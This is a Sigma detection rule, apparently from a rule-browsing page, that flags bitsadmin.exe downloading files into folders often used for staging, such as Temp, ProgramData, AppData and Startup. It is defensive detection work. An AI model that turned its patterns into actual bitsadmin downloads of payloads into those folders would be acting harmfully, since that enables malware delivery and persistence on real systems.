File Download Via Bitsadmin To A Suspicious Target Folder

 1title: File Download Via Bitsadmin To A Suspicious Target Folder
 2id: 2ddef153-167b-4e89-86b6-757a9e65dcac
 3related:
 4    - id: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248
 5      type: obsolete
 6    - id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67
 7      type: similar
 8status: test
 9description: Detects usage of bitsadmin downloading a file to a suspicious target folder
10references:
11    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
12    - https://isc.sans.edu/diary/22264
13    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
14    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
15author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
16date: 2022-06-28
17modified: 2025-12-10
18tags:
19    - attack.persistence
20    - attack.execution
21    - attack.stealth
22    - attack.t1197
23    - attack.s0190
24    - attack.t1036.003
25    - attack.command-and-control
26    - attack.t1105
27logsource:
28    category: process_creation
29    product: windows
30detection:
31    selection_img:
32        - Image|endswith: '\bitsadmin.exe'
33        - OriginalFileName: 'bitsadmin.exe'
34    selection_flags:
35        CommandLine|contains:
36            - ' /transfer '
37            - ' /create '
38            - ' /addfile '
39    selection_folder:
40        CommandLine|contains:
41            - ':\Perflogs'
42            - ':\ProgramData\'
43            - ':\Temp\'
44            - ':\Users\Public\'
45            - ':\Windows\'
46            - '\$Recycle.Bin\'
47            - '\AppData\Local\'
48            - '\AppData\Roaming\'
49            - '\Contacts\'
50            - '\Desktop\'
51            - '\Favorites\'
52            - '\Favourites\'
53            - '\inetpub\wwwroot\'
54            - '\Music\'
55            - '\Pictures\'
56            - '\Start Menu\Programs\Startup\'
57            - '\Users\Default\'
58            - '\Videos\'
59            - '%ProgramData%'
60            - '%public%'
61            - '%temp%'
62            - '%tmp%'
63    condition: all of selection_*
64falsepositives:
65    - Unknown
66level: high
67regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml
68simulation:
69    - type: atomic-red-team
70      name: Windows - BITSAdmin BITS Download
71      technique: T1105
72      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

References

• https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

  
  Read More

• https://isc.sans.edu/diary/22264

  
  Read More

• https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

  
  Read More

• https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

  
  Read More

Related rules

• File Download Via Bitsadmin
• File With Suspicious Extension Downloaded Via Bitsadmin
• Suspicious Download From File-Sharing Website Via Bitsadmin
• Bitsadmin to Uncommon IP Server Address
• Bitsadmin to Uncommon TLD